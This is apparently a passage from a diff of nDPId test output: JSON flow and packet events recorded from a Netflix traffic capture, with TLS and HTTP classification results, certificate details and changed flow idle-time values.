-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2497,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1484319070655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319070655,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWnIX9guFwKgBBwBQz9pdV1SucdRxsqAS\/\/+\/OwAAAgQFtAEDAwkEAggKgYtW3h9lRgI="} 
-00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2499,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1484319070656,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319070656,"pkt":"gCqoTGHM5JjWH70UCABFAAA0S\/NAAEAGCafAqAEHF\/YLhc\/aAFBx1HGyXVdUr4AQEBXd4QAAAQEICh9lRhWBi1be"} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2501,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319070636,"flow_last_seen":1484319070660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1484319070660,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/?o=AQEfKq2oMrLRiWL1ouVaJpeQLBWjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JfEef80K02ynIjLLoi-HZB1uQ10","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4214,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319091296,"flow_last_seen":1484319091296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319091296,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4214,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1484319091296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319091296,"pkt":"gCqoTGHM5JjWH70UCABFAABAakNAAEAG60LAqAEHF\/YLjc\/hAFDAgDYQAAAAALAC\/\/\/YUQAAAgQFtAEDAwUBAQgKH2WTUQAAAAAEAgAA"} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4216,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1484319091309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319091309,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz+FsswOfwIA2EaAS\/\/85DQAAAgQFtAEDAwkEAggK\/T5Cox9lk1E="} 
-00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4217,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1484319091310,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319091310,"pkt":"gCqoTGHM5JjWH70UCABFAAA00UpAAEAGhEfAqAEHF\/YLjc\/hAFDAgDYRbLMDoIAQEBVXuAAAAQEICh9lk1\/9PkKj"} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4218,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319091296,"flow_last_seen":1484319091314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1484319091314,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/?o=AQEfKq2oMrLRiWL2puNQJJ2TLhuiGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpP7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=Dh278u2UpApOCGUj5RxV8azNWX8","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1935,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064711,"flow_last_seen":1484319064711,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064711,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1935,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1484319064711,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064711,"pkt":"gCqoTGHM5JjWH70UCABFAABAfOpAAEAGov3AqAEHNCUk\/M\/TAbvE99WSAAAAALAC\/\/9grAAAAgQFtAEDAwUBAQgKH2UwAgAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1937,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1484319064722,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064722,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGRvs2vxEzwKgBBwG7z9JcNkhzU8YNlaASOJDYrwAAAgQFtAQCCAqtilitH2Uv3gEDAwg="} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1938,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1484319064722,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064722,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGR\/s2vxEzwKgBBwG7z8mqa43KKbVWHqASOJAmtQAAAgQFtAQCCAqtilitH2Uv3QEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1939,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1484319064723,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064723,"pkt":"gCqoTGHM5JjWH70UCABFAAA06mxAAEAGRrbAqAEHNr8RM8\/SAbtTxg2VXDZIdIAQEBUvyAAAAQEICh9lMA6tilit"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1940,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1484319064724,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064724,"pkt":"gCqoTGHM5JjWH70UCABFAAA0RtdAAEAG6kvAqAEHNr8RM8\/JAbsptVYeqmuNy4AQEBV9zAAAAQEICh9lMA6tilit"} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1942,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064669,"flow_last_seen":1484319064728,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319064728,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1943,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064671,"flow_last_seen":1484319064729,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319064729,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1950,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1484319064781,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064781,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGNcw0JST8wKgBBwG7z9NfgzodxPfVk6ASRersYQAAAgQFtAQCCAqFpSALH2UwAgEDAwg="} 
+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1953,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1484319064782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064782,"pkt":"gCqoTGHM5JjWH70UCABFAAA0MmJAAEAG7ZHAqAEHNCUk\/M\/TAbvE99WTX4M6HoAQEBVQwAAAAQEICh9lMEaFpSAL"} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1957,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064711,"flow_last_seen":1484319064785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1484319064785,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1961,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064669,"flow_last_seen":1484319064796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319064796,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying 
HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1962,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064671,"flow_last_seen":1484319064823,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319064823,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1964,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064669,"flow_last_seen":1484319064850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319064850,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1968,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064711,"flow_last_seen":1484319064885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319064885,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
+01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1969,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064671,"flow_last_seen":1484319064898,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319064898,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} +01370{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1977,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064711,"flow_last_seen":1484319064950,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319064950,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2494,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319070636,"flow_last_seen":1484319070636,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319070636,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2494,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1484319070636,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319070636,"pkt":"gCqoTGHM5JjWH70UCABFAABAs25AAEAGoh\/AqAEHF\/YLhc\/aAFBx1HGxAAAAALAC\/\/84uwAAAgQFtAEDAwUBAQgKH2VGAgAAAAAEAgAA"} 
+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2497,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1484319070655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319070655,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWnIX9guFwKgBBwBQz9pdV1SucdRxsqAS\/\/+\/OwAAAgQFtAEDAwkEAggKgYtW3h9lRgI="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2499,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1484319070656,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319070656,"pkt":"gCqoTGHM5JjWH70UCABFAAA0S\/NAAEAGCafAqAEHF\/YLhc\/aAFBx1HGyXVdUr4AQEBXd4QAAAQEICh9lRhWBi1be"} +01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2501,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319070636,"flow_last_seen":1484319070660,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1484319070660,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 
{"hostname":"23.246.11.133","url":"23.246.11.133\/?o=AQEfKq2oMrLRiWL1ouVaJpeQLBWjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JfEef80K02ynIjLLoi-HZB1uQ10","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4214,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319091296,"flow_last_seen":1484319091296,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319091296,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4214,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1484319091296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319091296,"pkt":"gCqoTGHM5JjWH70UCABFAABAakNAAEAG60LAqAEHF\/YLjc\/hAFDAgDYQAAAAALAC\/\/\/YUQAAAgQFtAEDAwUBAQgKH2WTUQAAAAAEAgAA"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4216,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1484319091309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319091309,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz+FsswOfwIA2EaAS\/\/85DQAAAgQFtAEDAwkEAggK\/T5Cox9lk1E="} 
+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4217,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1484319091310,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319091310,"pkt":"gCqoTGHM5JjWH70UCABFAAA00UpAAEAGhEfAqAEHF\/YLjc\/hAFDAgDYRbLMDoIAQEBVXuAAAAQEICh9lk1\/9PkKj"} +01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4218,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319091296,"flow_last_seen":1484319091314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1484319091314,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 